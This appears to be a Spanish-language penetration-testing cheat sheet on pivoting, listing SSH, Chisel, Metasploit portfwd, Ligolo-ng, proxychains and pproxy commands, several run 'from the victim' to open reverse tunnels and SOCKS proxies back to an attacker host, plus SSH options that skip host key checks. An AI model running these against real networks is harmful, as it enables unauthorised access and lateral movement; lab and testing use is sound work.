Túneles con SSH
# Túnel local
ssh user@victimip -L 8081:127.0.0.1:8080
# Túnel reverso
ssh user@victimip -R 8080:127.0.0.1:8081
# Proxy Socks
ssh user@victimip -D 8080
# Proxy Socks reverso
ssh user@attackip -R 8080
# SSH con saltos
ssh user@victimip -J user@jumpip1:port,user@jumpip2:port
# Socks en 0.0.0.0 que no se cae nunca
ssh -f -N -g -o ServerAliveInterval=5 -o ServerAliveCountMax=200 -D $puerto $usuario@$ip_sonda
# SSH que no verifique identidad del host
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null usuario@hostname
Túneles con Chisel
https://github.com/jpillora/chisel
Proxy Socks
# Desde la kali
chisel server --reverse -p 9002
# Desde la victima
chisel.exe client 10.10.15.1:9002 R:socks
Túnel local
# Desde la kali
chisel server --reverse -p 9002
# Desde la victima
chisel client 10.10.14.200:9002 R:5985:172.16.22.1:5985
Túnel reverso
# Desde la kali
chisel server --reverse -p 9002
# Desde la victima
chisel client 10.10.14.200:9002 0.0.0.0:4444:127.0.0.1:4444
Túneles con MSFConsole
# Túnel local
portfwd add -l 5985 -r 127.0.0.1 -p 5985
Túneles con Ligolo
https://github.com/nicocha30/ligolo-ng
# Levantar el listener y tunelizar por ahi
sudo ./proxy -selfcert
interface_create --name "ligolo"
session
tunnel_start --tun ligolo
sudo ip route add 172.16.156.0/24 dev ligolo
routel
# Conectar a ligolo listener
./agent.exe -connect 192.168.45.168:11601 -ignore-cert
Proxychains
# Modo silencioso
proxychains -q command
# Coger configuracion de un archivo
proxychains -f proxychainsconfigfile.txt command
# Configuracion por defecto
/etc/proxychains4.conf
Redirecciona del proxy HTTP a SocksProxy
pproxy -l http://[ip]:[port] -r socks5://[ip]:[port] -vv
Otros